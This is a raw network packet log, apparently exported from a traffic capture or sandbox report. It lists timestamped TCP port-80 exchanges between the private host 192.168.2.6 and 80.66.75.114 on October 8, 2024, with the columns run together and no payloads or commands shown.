                                                Oct 8, 2024 04:24:39.707458973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707459927 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707477093 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707482100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707496881 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707504988 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707519054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707525015 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707542896 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707545996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707556009 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707566977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707585096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707587957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707603931 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707608938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707624912 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707629919 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707643986 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707664967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794444084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794490099 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794553041 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794559956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794578075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794600964 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794601917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794622898 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794626951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794647932 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794656992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794667959 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794684887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794707060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794723034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794733047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794747114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794754982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794771910 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794775963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794792891 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794797897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794812918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794819117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794832945 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794840097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794856071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794861078 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794882059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794883013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794903994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794912100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794923067 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794925928 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794945002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794949055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794959068 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.794969082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794992924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.794998884 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.795008898 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.795034885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.795986891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796005011 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796026945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796040058 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796055079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796072960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796073914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796091080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796097040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796117067 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796118975 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796133995 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796138048 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796149969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796180010 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796180964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796200037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796228886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796235085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796248913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796277046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796293020 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796298027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796318054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796324015 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796339989 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796345949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796361923 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796363115 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796379089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796380997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796403885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796408892 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796422958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796442986 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796454906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796473980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796495914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796497107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796510935 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796534061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796602011 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796632051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796648979 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796652079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796668053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796673059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796680927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796694040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796708107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796727896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796736002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796749115 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796767950 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796777964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796782017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796798944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796814919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796819925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796837091 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796842098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796858072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796864033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796879053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796891928 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796899080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796912909 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796930075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796941996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796950102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796962976 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.796981096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.796989918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797012091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797013044 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797023058 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797033072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797048092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797049999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797068119 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797072887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797081947 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797096968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797108889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797115088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797138929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797139883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797151089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797159910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797179937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797188997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797199011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797208071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797224998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797231913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797245979 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797252893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797266006 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797274113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797291994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797302008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797310114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797319889 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797343016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797343969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797364950 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797369957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797386885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797390938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797419071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797429085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797441959 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797455072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797462940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797481060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797485113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797497988 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797507048 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797522068 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797525883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797538042 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797563076 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797564983 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797585964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797589064 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797605038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797612906 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797629118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797629118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797647953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797652960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797662020 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797676086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797704935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797715902 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797720909 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797740936 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797751904 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797754049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797780991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797790051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797806978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797821999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797856092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797859907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797871113 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797882080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797897100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797898054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797918081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797919989 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797930002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797946930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797966003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797987938 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797992945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798011065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798017025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798029900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798037052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798059940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798072100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798080921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798089027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798101902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798104048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798122883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798124075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798137903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798142910 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798155069 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798166037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798177004 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798187017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798202991 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798207998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798221111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798228025 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798243046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798252106 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798260927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798266888 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798283100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798290014 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798306942 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798310041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798330069 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798331976 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798352003 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798376083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885314941 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885339022 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885364056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885394096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885413885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885433912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885459900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885482073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885499954 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885529041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885529041 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885549068 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885569096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885586977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885607958 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885704994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885750055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885770082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885842085 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885863066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885883093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885901928 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885977030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885977030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885977030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.886837006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.886920929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.886949062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.886960030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.886971951 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.886991978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887010098 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887023926 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887022972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887043953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887070894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887082100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887104034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887110949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887130976 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887165070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887171984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887316942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887336969 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887353897 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887370110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887435913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887453079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887475014 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887491941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887506008 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887691021 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887731075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887758970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887778997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887795925 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887814999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887814999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887836933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887856960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887875080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887885094 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887898922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887908936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887923002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887927055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887942076 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887948036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887964010 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887970924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887984991 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887998104 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888005972 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888015985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888034105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888048887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888052940 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888070107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888086081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888092041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888104916 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888124943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888128996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888154030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888163090 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888171911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888190031 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888202906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888210058 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888222933 CEST804973880.66.75.114192.168.2.6
